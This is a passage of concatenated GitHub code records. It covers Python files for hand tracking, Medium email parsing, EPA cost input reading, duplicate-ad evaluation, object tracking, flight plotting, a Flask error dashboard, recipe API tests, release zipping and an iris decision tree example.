with Mediapipe\n self.handLandmarks = self.handResult.multi_hand_landmarks\n if self.handLandmarks:\n for landmark in self.handLandmarks:\n if draw:\n # Showing the landmarks and drawing the lines betweeen points\n self.mpDraw.draw_landmarks(frame, landmark, self.mpHandModule.HAND_CONNECTIONS)\n \n # As result, the function returns the 'frame' value\n return frame\n \n # Defining a function to find positions of landmarks\n def findPosition(self, frame, handNumber=0, draw=True):\n\n # Creating an empty array to store position values\n self.landmarkPositions = []\n\n if self.handLandmarks:\n # Declaring a variable for choosing hand\n handNo = self.handLandmarks[handNumber]\n # Gathering landmark informations\n for id, lm in enumerate(handNo.landmark):\n # Getting height, width and channel info of 'frame'\n height, width, channel = frame.shape\n\n # Since the 'lm' values gives the decimal values of points,\n # in other words, giving the ratio of points to the 'frame',\n # we have to multiply these values with height and width values of 'frame' to get locations of points.\n posX, posY = int(lm.x * width), int(lm.y * height)\n\n # Adding calculated X and Y positions with finger IDs to the list which created at the beginning of the function\n self.landmarkPositions.append([id, posX, posY])\n\n # If 'draw' parameter is set as 'True', then draw circles on each finger landmark\n if draw:\n cv.circle(frame, (posX, posY), 10, (0, 255, 255), cv.FILLED)\n\n # As result, the function returns the 'landmarkPositions' value\n return self.landmarkPositions\n\n # Defining a function to count raised fingers\n def fingersUp(self):\n\n # Creating an empty array to store situations of fingers\n fingerSituation = []\n\n # If the Landmark 0 is at the right of the Landmark 1, then there is right hand in the frame\n if self.landmarkPositions[0][1] > self.landmarkPositions[1][1]:\n rightHand = True\n else:\n rightHand = False\n\n ########################################\n # If a fingertip's landmark is below the previous two indexes relative to its y-coordinate,\n # it means that, that finger is closed.\n # But if the thumb is closed, the index of the tip will not be below of the previous index;\n # it's further to the right if it is right hand.\n # Therefore, the x-coordinate of the thumb tip should be checked, not the y-coordinate.\n ########################################\n\n # If it is right hand, then the thumb tip will be on the left of the previous index when the finger is up/open\n if rightHand:\n if self.landmarkPositions[self.tipIDs[0]][1] < self.landmarkPositions[self.tipIDs[0]-1][1]:\n # If the finger is opened, then add '1' to the 'fingerSituation' list\n fingerSituation.append(1)\n else:\n # If not, add '0' to the list\n fingerSituation.append(0)\n # If it is left hand, the opposite of the previous check should be performed\n else:\n if self.landmarkPositions[self.tipIDs[0]][1] > self.landmarkPositions[self.tipIDs[0]-1][1]:\n fingerSituation.append(1)\n else:\n fingerSituation.append(0)\n\n # For the other fingers, the y-coordinate of landmarks should be checked\n for i in range(1, 5):\n if self.landmarkPositions[self.tipIDs[i]][2] < self.landmarkPositions[self.tipIDs[i]-2][2]:\n fingerSituation.append(1)\n else:\n fingerSituation.append(0)\n\n return fingerSituation\n\ndef main():\n\n # Capturing the frames with the built-in webcam\n # The number '0' can be changed according to the webcams connected to PC (eg. VideoCapture(1), VideoCapture(2), ...)\n capture = cv.VideoCapture(0)\n\n # If camera is not opened, then exit the program.\n if not capture.isOpened():\n print(\"Camera can not be opened!\")\n exit()\n\n # Declaring a variable to calculate the FPS\n previousTime = 0\n\n # Initializating the 'handDetection()' function with a variable\n detect = handDetection()\n\n while True:\n # Capturing frames and giving mirror view\n ret, frame = capture.read()\n frame = cv.flip(frame, 1)\n\n # Running the 'findHand' function to be able to detect hands \n frame = detect.findHand(frame)\n\n # Detecting positions of landmarks and printing them\n landmarkPositions = detect.findPosition(frame)\n\n # If no hands are detected after the webcam is turned on, the program will give an error\n # To prevent this, the landmark positions are printed only when a landmark is detected\n if len(landmarkPositions) != 0:\n print(landmarkPositions[0])\n\n # When frames are read correctly, then 'ret' will be True\n if not ret:\n print(\"Frames can not be received. Exiting...\")\n break\n\n # Calculating the FPS and displaying it on the frame\n currentTime = time.time()\n FPS = 1 / (currentTime - previousTime)\n previousTime = currentTime\n cv.putText(frame, f\"FPS: {int(FPS)}\", (10, 35), cv.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\n\n # Displaying the captured frames\n cv.imshow(\"Hand Tracking\", frame)\n\n # End the 'while' loop (shortly, kill the program) if the key 'q' is pressed\n if cv.waitKey(1) == ord(\"q\"):\n break\n \n # Releasing the capture and kill the windows that are opened, if everything is done\n capture.release()\n cv.destroyAllWindows()\n\nif __name__ == \"__main__\":\n main()","repo_name":"efetunca/Virtual-Painter","sub_path":"HandTrackingModule.py","file_name":"HandTrackingModule.py","file_ext":"py","file_size_in_byte":7369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"22663894118","text":"import datetime\nimport email\nimport hashlib\nimport quopri\n\nfrom bs4 import BeautifulSoup\n\nMEDIUM_URL = \"https://medium.com/\"\nURL_LEN = len(MEDIUM_URL)\n\n\ndef get_subject(subject):\n subject_parts = []\n subjects = email.header.decode_header(subject)\n for content, encoding in subjects:\n try:\n subject_parts.append(content.decode(encoding or \"utf8\"))\n except:\n subject_parts.append(content)\n return \"\".join(subject_parts)\n\n\ndef get_message_id(to, message_id):\n sh1 = hashlib.sha1()\n sh1.update(to.encode())\n sh1.update(message_id.encode())\n return sh1.hexdigest()\n\n\ndef mask_to(to):\n return hashlib.sha1(to.encode()).hexdigest()\n\n\ndef parse_mail(email_message):\n parts = {part.get_content_type(): part for part in email_message.get_payload()}\n decoded = quopri.decodestring(parts[\"text/html\"].get_payload()).decode(\"utf8\")\n to = email_message[\"To\"]\n mail_info = {\n \"id\": get_message_id(to, email_message[\"Message-ID\"]),\n \"to\": mask_to(to),\n \"from\": email_message.get(\"From\"),\n \"subject\": get_subject(email_message.get(\"Subject\")),\n \"date\": datetime.datetime.strptime(\n email_message.get(\"Date\"), \"%a, %d %b %Y %H:%M:%S +0000 (%Z)\"\n ),\n }\n return mail_info, decoded\n\n\ndef get_articles(message):\n soup = BeautifulSoup(message, \"lxml\")\n main = soup.find(\"table\", {\"class\": \"email-fillWidth\"})\n digest = main.find(\"table\", {\"class\": \"email-digest\"})\n\n sections = digest.find_all(\"tr\", recursive=False)\n\n for section in sections:\n [table_cell] = section.findChildren(\"td\", recursive=False)\n section_title_div = table_cell.find(\"div\")\n\n if section_title_div is None:\n continue\n\n section_title = section_title_div.text\n\n article_tables = table_cell.findChildren(\"table\", recursive=False)\n\n for article in article_tables:\n post_title = article.find(\n \"div\", {\"class\": \"email-digestPostTitle--hero\"}\n ) or article.find(\"div\", {\"class\": \"email-digestPostTitle\"})\n post_subtitle = article.find(\"div\", {\"class\": \"email-digestPostSubtitle\"})\n\n post_url, _, _ = post_title.parent.find(\"a\")[\"href\"].partition(\"?\")\n\n anchors = article.find_all(\"a\")\n author = (None, None)\n site = (None, None)\n\n for anchor in anchors:\n url = anchor[\"href\"][URL_LEN:]\n first, _, _ = url.partition(\"?\")\n if first.startswith(\"@\"):\n author = (anchor.text, first)\n else:\n site = (anchor.text, first)\n\n members_only = (\n article.find(\"img\", {\"class\": \"email-digestMemberOnlyStar\"}) is not None\n )\n\n data = {\n \"section_title\": section_title,\n \"post_title\": post_title.text,\n \"post_subtitle\": post_subtitle.text if bool(post_subtitle) else None,\n \"post_url\": post_url,\n \"author_name\": author[0],\n \"author_handle\": author[1],\n \"site_name\": site[0],\n \"site_slug\": site[1],\n \"members_only\": members_only,\n }\n yield data\n","repo_name":"fferegrino/medium-collector","sub_path":"medium_collector/download/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"28332310542","text":"\"\"\"\n\n**INPUT FILE FORMAT**\n\nThe file format consists of a one-row data header and subsequent data rows.\n\nThe data represent the percentage of engines complying with the new standard, associated with standardyear_id, and in\nthe given year, indicated by the column headers. In the table below, all engines shown comply with the 2027 standards\nin 2027 (and continue to do so) while no engines meet the 2031 standards in 2027 since 2027 engines would be sold prior\nto the 2031 standards being implemented. However, all 2031 engines comply with 2031 and later standards.\n\nFile Type\n comma-separated values (CSV)\n\nSample Data Columns\n .. csv-table::\n :widths: auto\n\n optionID,regClassName,regClassID,FuelName,fuelTypeID,standardyear_id,2027,2031\n 0,LHD45,42,Gasoline,1,2027,1,1\n 0,LHD45,42,Diesel,2,2027,1,1\n 0,LHD45,42,CNG,3,2027,1,1\n 0,LHD45,42,Gasoline,1,2031,,1\n 0,LHD45,42,Diesel,2,2031,,1\n 0,LHD45,42,CNG,3,2031,,1\n\nData Column Name and Description\n :optionID:\n The option or alternative number.\n\n :regClassName:\n The MOVES regulatory class name corresponding to the regClassID.\n\n :regClassID:\n The MOVES regClass ID, an integer.\n\n :FuelName:\n The MOVES fuel type name corresponding to the fuelTypeID.\n\n :fuelTypeID:\n The MOVES fuel type ID, an integer, where 1=Gasoline, 2=Diesel, etc.\n\n :standardyear_id:\n The year in which a new standard or provision (for which a corresponding cost exists) is implemented.\n\n :2027:\n The share of engines meeting a new standard that begins in the standardyear_id.\n\n :2031:\n The share of engines meeting a new standard that begins in the standardyear_id.\n\n----\n\n**CODE**\n\n\"\"\"\nimport sys\nimport pandas as pd\n\nfrom bca_tool_code.general_input_modules.general_functions import read_input_file\nfrom bca_tool_code.general_input_modules.input_files import InputFiles\n\n\nclass TechPenetrations:\n \"\"\"\n\n The TechPenetrations class reads the tech penetrations file and provides methods to query its contents.\n\n \"\"\"\n def __init__(self):\n self._dict = dict()\n self.start_years = list()\n self.value_name = 'techpen'\n self.unit_id = None\n\n def init_from_file(self, filepath, unit_id):\n \"\"\"\n\n Parameters:\n filepath: Path to the specified file.\\n\n unit_id: str; 'engine_id' or 'vehicle_id'.\n\n Returns:\n Reads file at filepath; converts monetized values to analysis dollars (if applicable); creates a dictionary\n and other attributes specified in the class __init__.\n\n \"\"\"\n df = read_input_file(filepath, skiprows=1)\n\n self.unit_id = unit_id\n if unit_id == 'engine_id':\n df.insert(0,\n unit_id,\n pd.Series(zip(\n df['regClassID'],\n df['fuelTypeID']\n )))\n id_vars = ['optionID', unit_id, 'regClassID', 'fuelTypeID', 'standardyear_id']\n elif unit_id == 'vehicle_id':\n df.insert(0,\n unit_id,\n pd.Series(zip(\n df['sourceTypeID'],\n df['regClassID'],\n df['fuelTypeID']\n )))\n id_vars = ['optionID', unit_id, 'sourceTypeID', 'regClassID', 'fuelTypeID', 'standardyear_id']\n else:\n print(f'\\nImproper unit_id passed to {self}')\n sys.exit()\n\n df = pd.melt(df,\n id_vars=id_vars,\n value_vars=[col for col in df.columns if '20' in col],\n var_name='modelyear_id',\n value_name=self.value_name)\n\n df['modelyear_id'] = pd.to_numeric(df['modelyear_id'])\n self.start_years = df['modelyear_id'].unique()\n\n key = pd.Series(zip(\n df[unit_id],\n df['optionID'],\n df['modelyear_id'],\n df['standardyear_id'],\n ))\n df.set_index(key, inplace=True)\n\n self._dict = df.to_dict('index')\n\n # update input_files_pathlist if this class is used\n InputFiles.update_pathlist(filepath)\n\n def get_attribute_value(self, vehicle, standardyear_id):\n \"\"\"\n\n Parameters:\n vehicle: object; an object of the Vehicle class.\n standardyear_id: int; the year in which a new standard starts.\n\n Returns:\n A single tech penetration value for the given vehicle.\n\n \"\"\"\n unit_id = vehicle.engine_id\n if self.unit_id == 'vehicle_id':\n unit_id = vehicle.vehicle_id\n option_id, modelyear_id = vehicle.option_id, vehicle.modelyear_id\n year = max([int(year) for year in self.start_years if int(year) <= modelyear_id])\n\n return self._dict[unit_id, option_id, year, standardyear_id][self.value_name]\n","repo_name":"USEPA/EPA_HD_CTI_BCA","sub_path":"bca_tool_code/general_input_modules/tech_penetrations.py","file_name":"tech_penetrations.py","file_ext":"py","file_size_in_byte":4959,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"70606434711","text":"# *** Evaluation ***\n\"\"\" Script receives the dataframe with the processed and analyzed testdata. \nUses the given similarity-scores for each pair to decide if the pair is part of the class duplicate or non-duplicate.\nSimilarity-scores are rated with a threshold. \n\n# SET Measurements\n --> The threshold is defined by a class object and varies with each method.\n Threshold, depending on source_url, delivers best result and is set via trial and error for each method.\n\n# CLASSIFY data\n --> The pairs that get classified as duplicates are stored in an output df called df_pairs. \n\n# EVALUATE data\n --> The function __classification() is used for a classification report in logging. Only used for masterthesis.\n --> The function __plotting() is used for visualization of the results. Only used for masterthesis.\n\n\nInspired by: https://www.kaggle.com/currie32/predicting-similarity-tfidfvectorizer-doc2vec \"\"\"\n\n# ## Imports\nimport pandas as pd\nimport numpy as np\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\nimport matplotlib.pyplot as plt\nfrom collections import Counter\nimport seaborn as sns\nimport logging\n\n# ## Class Threshold\nclass Threshold:\n \"\"\" Class to manage the setter and getter for the threshold-objects depending on the methods and source_urls.\"\"\"\n # init method\n def __init__(self, name, df):\n self.name = name\n self.df = df\n self.threshold = None\n self.threshold_source = None\n\n # getter method for thresholds depending on source_url\n def get_threshold_source(self): \n return self.threshold_source\n\n # getter method for threshold\n def get_threshold(self): \n return self.threshold \n\n # setter method for thresholds depending on source_url \n def set_threshold_source(self):\n df = self.df\n step_key = self.name\n if self.name == \"countvec\":\n threshold = (df[step_key].mean() + df[step_key].std()+ df[step_key].std()+ df[step_key].std()) \n elif self.name ==\"doc2vec\":\n threshold = (df[step_key].mean()+ df[step_key].std()+ df[step_key].std()/2)\n elif self.name == \"levenshtein\":\n threshold = (df[step_key].mean() + df[step_key].std()+ df[step_key].std())\n elif self.name == \"tfidf\":\n threshold = (df[step_key].mean() + df[step_key].std()+ df[step_key].std()+ df[step_key].std())\n elif self.name == \"shingling\":\n threshold = (df[step_key].mean() + df[step_key].std()+ df[step_key].std()+ df[step_key].std())\n self.threshold_source = threshold\n\n # setter method for threshold\n def set_threshold(self):\n df = self.df\n step_key = self.name\n if self.name == \"countvec\":\n threshold = (df[step_key].mean()) \n elif self.name == \"doc2vec\":\n threshold = (df[step_key].mean()+ df[step_key].std())\n elif self.name == \"levenshtein\":\n threshold = (df[step_key].mean()+ df[step_key].std()) \n elif self.name == \"tfidf\":\n threshold = (df[step_key].mean()+ df[step_key].std()/2)\n elif self.name == \"shingling\":\n threshold = (df[step_key].mean())\n self.threshold = threshold\n\n\n# ## Functions\ndef starter(df: pd.DataFrame, step_key: str) -> pd.DataFrame:\n\n \"\"\"Function iterates over dataframe and evaluates the final data. Returns a df with the chosen duplicate pairs.\n\n Parameters\n ----------\n df: pd.DataFrame\n Dataframe contains one table from the input Dictionary to be evaluated.\n step_key: str\n String with the step_key to define which parts of the program need to be used.\n \n Raises\n ------\n KeyError\n Check if a specific column exists in the DataFrame\n\n Returns\n -------\n df_pairs: pd.Dataframe\n Dataframe with the Output-duplicates (pairwise). \"\"\"\n\n # Set Output DataFrame to store found duplicate-pairs\n df_pairs = pd.DataFrame()\n\n # Initiate Threshold-object to set different values depending on metadata \"source_url\"\n thres_obj = Threshold(step_key, df)\n thres_obj.set_threshold_source()\n thres_obj.set_threshold()\n\n # Set scores-list\n scores = list()\n\n # A. SET Measurements\n # --------------------\n \"\"\" Iterate over df, check if a pair has the same source_website and set threshold (higher for same urls and lower for differnt urls) \"\"\"\n for ind in df.index:\n if ind%2 == False:\n if df['source_website'][ind] == df['source_website'][ind+1]:\n # get higher threshold\n threshold = thres_obj.get_threshold_source()\n else:\n # get lower threshold\n threshold = thres_obj.get_threshold()\n else: \n pass\n\n \"\"\"# If you want to use generalized threshold for all methods and not a source related one, use the following line.\n threshold = (df[step_key].mean()+ df[step_key].std())\"\"\"\n\n # B. CLASSIFY the data\n # --------------------\n \"\"\" Check if a job-ad has a score over or under the threshold and store the positives in df_pairs.\"\"\"\n if np.count_nonzero(float(df[step_key][ind]) >= threshold):\n scores.append(1)\n \"\"\" The following line is commented out because it is only needed for masterthesis.\n df.at[ind, 'Shingling_duplicate'] = 1\"\"\"\n df_pairs = df_pairs.append(df.iloc[ind], ignore_index=True)\n else:\n scores.append(0)\n # following line commented out only for masterthesis needed\n \"\"\" df.at[ind, 'Shingling_duplicate'] = 0\n df_pairs = df_pairs.append(df.iloc[ind], ignore_index=True) \"\"\"\n\n # C. EVALUATE data\n # -----------------\n \"\"\" Get Classification report in logging. Only needed for annotated testdata. In real implementation it is not used or commented out. \"\"\"\n __classification(step_key, thres_obj, df, scores)\n\n \"\"\"Get Plotting of results in logging. Only needed for annotated testdata. In real implementaiton it is not used or commented out. \"\"\"\n __plotting(step_key, df)\n return df_pairs\n\n# Classification Report\ndef __classification(step_key, thres_obj, df, scores):\n \"\"\" Logs a classification report in the Logging-file (Logger.log). \n Contains:\n * threshold-settings\n * mean\n * median\n * standard derivation\n * accuracy\n * confusion matrix\n * classification report \"\"\"\n\n # Check if input-dataframe contains annotated data, if function is not called.\n if 'testset_id' in df:\n try:\n logging.info('\\n\\n***** EVALUATION: CLASSIFICATION REPORT *****')\n # Only count every second row because one pair = 2 rows and 2 scores (but only one needs to be counted)\n accuracy = accuracy_score(df.duplicate[df.index % 2 != 0], scores[0::2]) * 100\n logging.info(f'''\\n\\n{step_key}:\n threshold set to: {thres_obj.get_threshold_source()} & {thres_obj.get_threshold()}\n MEAN {df[step_key].mean()}\n MEDIAN {df[step_key].median()}\n STANDARD DEVIATION {df[step_key].std()}\n \\nAccuracy score is {round(accuracy)}%.\n \\nConfusion Matrix:\\n{confusion_matrix(df.duplicate[df.index % 2 != 0], scores[0::2])}\n \\nClassification Report:\\n{classification_report(df.duplicate[df.index % 2 != 0], scores[0::2])}''')\n logging.info('\\n\\n***** /EVALUATION: CLASSIFICATION REPORT *****')\n except KeyError:\n logging.warning('Classfication Report was not generated, because no annotation was given.')\n pass\n else:\n logging.warning('Classification report was not generated because of missing annotation. Check again if needed.')\n\n# Plotting\ndef __plotting(step_key, df):\n \"\"\" Function plots the distribution of Similarity-Scores for a chosen method. \"\"\"\n \n # Check if input-dataframe contains annotated data, if function is not called.\n if 'testset_id' in df:\n try:\n logging.getLogger('matplotlib.font_manager').disabled = True\n sns.set_theme(style=\"ticks\", color_codes=True) \n x = df[step_key][df.index % 2 != 0] # Excludes every 2rd row starting from 0\n sns.violinplot(x=df[step_key], y=df.duplicate, orient='h', linewidth=3, data=x)\n ax = plt.gca()\n ax.set_yticks([0,1]) \n ax.set_yticklabels(['Nicht-Dubletten', 'Dubletten'])\n plt.axvline((df[step_key].mean()+ df[step_key].std()) , color='r')\n plt.xlabel(step_key)\n plt.xlim(0,1)\n #plt.show()\n plt.savefig(f'temp/temps_analysis_in/{step_key}_plots.png')\n plt.close()\n logging.info(f'Plotting used to visualize the results. Saved in file temp/temp_analysis_in/{step_key}_plots.png')\n except KeyError:\n logging.warning('while plotting, some column or value is missing. Check again if plotting is needed.')\n else:\n logging.warning('Plotting visualization was not generated, because no annotation was given.')\n pass","repo_name":"agerlac1/dupli","sub_path":"code/analysis/analysis_inside/evaluate_ratios.py","file_name":"evaluate_ratios.py","file_ext":"py","file_size_in_byte":9188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"33474557488","text":"import cv2\r\nimport numpy as np\r\nfrom object_detection import ObjectDetection\r\nimport math\r\n\r\n# Initialize Object Detection\r\nod = ObjectDetection()\r\n\r\n#cap = cv2.VideoCapture(\"los_angeles.mp4\")\r\ncap = cv2.VideoCapture(\"ucak1.mp4\")\r\n#cap = cv2.VideoCapture(\"yangin1.mp4\")\r\n\r\n# Initialize count\r\ncount = 0\r\ncenter_points_prev_frame = []\r\n\r\ntracking_objects = {}\r\ntrack_id = 0\r\n\r\nwhile True:\r\n ret, frame = cap.read()\r\n count += 1\r\n if not ret:\r\n break\r\n\r\n # Point current frame\r\n center_points_cur_frame = []\r\n\r\n # Detect objects on frame\r\n (class_ids, scores, boxes) = od.detect(frame)\r\n print(class_ids)\r\n for box in boxes:\r\n (x, y, w, h) = box\r\n cx = int((x + x + w) / 2)\r\n cy = int((y + y + h) / 2)\r\n center_points_cur_frame.append((cx, cy))\r\n #print(\"FRAME N°\", count, \" \", x, y, w, h)\r\n\r\n # cv2.circle(frame, (cx, cy), 5, (0, 0, 255), -1)\r\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\r\n\r\n\r\n for object_id, pt in tracking_objects.items():\r\n cv2.circle(frame, pt, 5, (0, 0, 255), -1)\r\n cv2.putText(frame, str(object_id), (pt[0], pt[1] - 7), 0, 1, (0, 0, 255), 2)\r\n\r\n\r\n cv2.imshow(\"Frame\", frame)\r\n\r\n key = cv2.waitKey(1)\r\n if key == 27:\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"bulentsezen/yolov4","sub_path":"object_tracking - 1.py","file_name":"object_tracking - 1.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"5"} +{"seq_id":"33098323418","text":"import json\n\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nf = open(\"sample_data.flight\", \"r\")\nflightData = json.load(f)\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nx_data = []\ny_data = []\nz_data = []\n\nfor coord in flightData[\"legalPoints\"]:\n x_data.append(coord[1])\n y_data.append(coord[2])\n z_data.append(coord[3])\n\n\nax.scatter(x_data, y_data, z_data, s=6, c=\"k\", marker='o')\n\nax.set_xlabel('x')\nax.set_ylabel('y')\nax.set_zlabel('z')\nax.set_xlim3d(0, 15)\nax.set_ylim3d(0, 15)\nax.set_zlim3d(0, 10)\nax.set_title(\"Flight Path\")\n\nfig.show()\nplt.show()","repo_name":"JonathanGWesterfield/Capstone","sub_path":"DroneDetection/plot2.py","file_name":"plot2.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25246966525","text":"\"\"\"\nCalled by app.py when `/error` route is called.\n\nLast updated: MB 27/09/2020 - created module.\n\"\"\"\n# import external libraries.\nimport os\nfrom flask import render_template, request, jsonify, redirect\n\n# import local modules.\nfrom src import error_controller, cache_handler\n\n\"\"\"\nCalled in app.py to initialise the routes in this file.\n\"\"\"\ndef init(app):\n\n \"\"\"\n Called by app.py. Retrieve new error information from DynamoDB if 'refresh'\n parameter is True. Otherwise display the currently cached error data.\n \"\"\"\n @app.route(\"/errors\", methods=['GET'])\n def errorDashboard():\n # check for refresh argument.\n refresh = request.args.get('refresh', default=False, type=bool)\n\n # if refresh is true, reload bot information into the cache.\n if refresh is True:\n print('refresh error list...')\n error_controller.update_error_cache()\n\n # render the bot template with current cached data.\n return render_template('pages/errorDashboard.html', data={**cache_handler.render_dict, **{\n 'errors': cache_handler.error_dict,\n }})\n\n \"\"\"\n Called by app.py. delete the error from cache and the db project.\n \"\"\"\n @app.route(\"/error/del\", methods=['POST'])\n def deleteError():\n # retrieve all log file names.\n log_files = [v for v in request.form if '.log' in v]\n\n # if there was a not a log file 'name' in the form, return invalid.\n if len(log_files) == 0:\n return jsonify(status=400, success=False)\n\n # run delete function.\n error_controller.remove_error(log_files[0])\n\n # render the bot template with current cached data.\n return redirect(\"/errors\")\n","repo_name":"Dwini/FIT4002_Ad_Transparency","sub_path":"dashboard/routes/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"34199905319","text":"def url_list_text_to_corpus(file,output):\n import os\n import input_texter\n import bash_commander\n import wiki_searcher\n import input_type\n \n text=''\n with open(file,'r') as f:\n raw_input=[line.strip() for line in f.readlines()]\n a=len(raw_input)\n print(\"Number of URLS to process: \",a)\n #text=input_texter()\n #if not bool(os.path.isfile(out)):\n # f=open(out,'x')\n # f.close()\n #else:\n # pass\n \n for i,line in enumerate(raw_input):\n try:\n print(line)\n out=input_texter(line)\n text=text+\" \"+out\n print(len(text))\n print(i,\" out from total: \",a,\" \",\"|\",a-i,\" left.\")\n f=open(output,'a')\n print(\"Destionation file opened.\")\n print(\"Length of the text to write: \",len(text))\n f.write(text)\n print(\"File written.\")\n f.close()\n print(\"Done,closing the file..\")\n #text.close()\n print(\"Data collection finished, file closed.\")\n except:\n continue\n #if i>5:\n # break\n \n \n #print(\"Destionation file opened.\")\n #print(\"Length of the text to write: \",len(text))\n #f.write(text)\n #print(\"File written.\")\n #f.close()\n #print(\"Done,closing the file..\")\n ##text.close()\n #print(\"Data collection finished, file closed.\")\n #return text","repo_name":"Eolas-bith/Eolas-public","sub_path":"url_list_text_to_corpus.py","file_name":"url_list_text_to_corpus.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"22746046811","text":"import json\n\nimport pytest\n\nfrom app.core.config import settings\n\nSOURCE = dict(name=\"Source\", url=\"http://source.com\")\nRECIPE = dict(\n name=\"Recipe\",\n url=\"http://recipe.com\",\n image=\"http://image.com\",\n ingredients=\"garlic tomato\",\n)\nSOURCE_ID: int = None\nRECIPE_ID: int = None\n\n\nclass TestRecipe:\n def test_create_source(self, client):\n global SOURCE_ID\n resp = client.post(f\"{settings.api.version}/sources/\", data=json.dumps(SOURCE))\n assert resp.status_code == 201\n SOURCE_ID = resp.json()[\"id\"]\n SOURCE.update({\"id\": SOURCE_ID, \"url\": \"source.com\"})\n assert resp.json() == SOURCE\n\n def test_add_recipe(self, client):\n global RECIPE_ID\n data = json.dumps(RECIPE)\n resp = client.post(\n f\"{settings.api.version}/sources/{SOURCE_ID}/recipes/\", data=data\n )\n if resp.status_code in (404, 422):\n pytest.skip(\"Source cannot be found.\")\n assert resp.status_code == 201\n RECIPE_ID = resp.json()[\"id\"]\n ingredients = resp.json()[\"ingredients\"]\n RECIPE.update({\"id\": RECIPE_ID, \"ingredients\": ingredients})\n assert resp.json() == RECIPE\n\n def test_get_recipe(self, client):\n resp = client.get(\n f\"{settings.api.version}/sources/{SOURCE_ID}/recipes/{RECIPE_ID}/\"\n )\n if resp.status_code in (404, 422):\n pytest.skip(\"Source cannot be found.\")\n assert resp.status_code == 200\n assert resp.json() == RECIPE\n\n def test_get_recipes(self, client):\n resp = client.get(f\"{settings.api.version}/sources/{SOURCE_ID}/recipes/\")\n if resp.status_code in (404, 422):\n pytest.skip(\"Source cannot be found.\")\n assert resp.status_code == 200\n\n def test_update_recipe(self, client):\n RECIPE[\"name\"] = \"Recipe 2.0\"\n data = json.dumps(dict(name=\"Recipe 2.0\"))\n resp = client.put(\n f\"{settings.api.version}/sources/{SOURCE_ID}/recipes/{RECIPE_ID}/\",\n data=data,\n )\n if resp.status_code in (404, 422):\n pytest.skip(\"Source cannot be found.\")\n assert resp.status_code == 200\n assert resp.json() == RECIPE\n\n def test_remove_recipe(self, client):\n resp = client.delete(\n f\"{settings.api.version}/sources/{SOURCE_ID}/recipes/{RECIPE_ID}/\"\n )\n if resp.status_code in (404, 422):\n pytest.skip(\"Source cannot be found.\")\n assert resp.status_code == 200\n assert resp.json() == RECIPE\n\n def test_remove_source(self, client):\n resp = client.delete(f\"{settings.api.version}/sources/{SOURCE_ID}/\")\n assert resp.status_code == 200\n assert resp.json() == SOURCE\n","repo_name":"AlexNilsson/mychef","sub_path":"backend/api/tests/api/test_recipes.py","file_name":"test_recipes.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"5"} +{"seq_id":"24265213459","text":"import os, zipfile\n\nignorar_diretorios = [\"node_modules\", \"release\"]\nignorar_arquivos = [\"release.py\", \".env\"]\n\ndeploy_ssl = False\n\nif not deploy_ssl:\n ignorar_diretorios.append(\".platform\")\n ignorar_arquivos.append(\"03_ssl.config\")\n\nprint(\"\\nIniciando empacotamente de release para o Beanstalk\\n\")\n\ndiretorio_raiz = os.path.relpath(os.getcwd())\nprint(\"Diretório raiz:\", diretorio_raiz + \"\\n\")\n\ndiretorio_final = diretorio_raiz + \"/release/\"\nprint(\"Diretorio final:\", diretorio_final + \"\\n\")\n\nzf = zipfile.ZipFile(\"./release/api_release.zip\", \"w\")\nfor dirname, subdirs, files in os.walk(diretorio_raiz):\n\n ignorar = False\n\n for i in ignorar_diretorios:\n if i in dirname:\n ignorar = True\n\n if(not ignorar):\n if dirname != \".\":\n print(\"Empacotando:\", dirname)\n zf.write(dirname)\n for filename in files:\n if not filename in ignorar_arquivos:\n zf.write(os.path.join(dirname, filename), \n os.path.relpath(os.path.join(dirname, filename)))\nzf.close()\n\nprint(\"\\nEmpacotamento de release finalizado\\n\")","repo_name":"atomo-binx/binx-backend","sub_path":"backend/release.py","file_name":"release.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21375916738","text":"\"\"\"\n================================================================\nPlot the decision surface of a decision tree on the iris dataset\n================================================================\n\nPlot the decision surface of a decision tree trained on pairs\nof features of the iris dataset.\n\nSee :ref:`decision tree ` for more information on the estimator.\n\nFor each pair of iris features, the decision tree learns decision\nboundaries made of combinations of simple thresholding rules inferred from\nthe training samples.\n\nThis code was adapted from the example provided by scikit-learn, available at\nhttp://scikit-learn.org/stable/auto_examples/tree/plot_iris.html#example-tree-plot-iris-py\n\"\"\"\nprint(__doc__)\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn.datasets import load_iris\nfrom sklearn.tree import DecisionTreeClassifier\n\n# Parameters\nn_classes = 3\nplot_colors = \"bry\"\nplot_step = 0.02\n\n# Load data\niris = load_iris()\n\nfor pairidx, pair in enumerate([[0, 1], [0, 2], [0, 3],\n [1, 2], [1, 3], [2, 3]]):\n # We only take the two corresponding features\n X = iris.data[:, pair] \n y = iris.target\n\n # Shuffle\n 